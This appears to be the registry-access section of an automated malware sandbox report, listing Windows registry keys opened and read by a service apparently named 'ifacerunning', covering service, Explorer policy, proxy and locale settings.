HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ifacerunning\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ifacerunning\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ifacerunning\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ifacerunning\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ObjectName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST
HKEY_CURRENT_USER
HKEY_USERS\.DEFAULT\Control Panel\International
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_CURRENT_USER\Software\Classes
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\ifacerunning_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\InactivityShutdownDelay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\KeepRunningThresholdMins

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\NoFileFolderConnection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ifacerunning\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ifacerunning\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ifacerunning\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ifacerunning\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Start
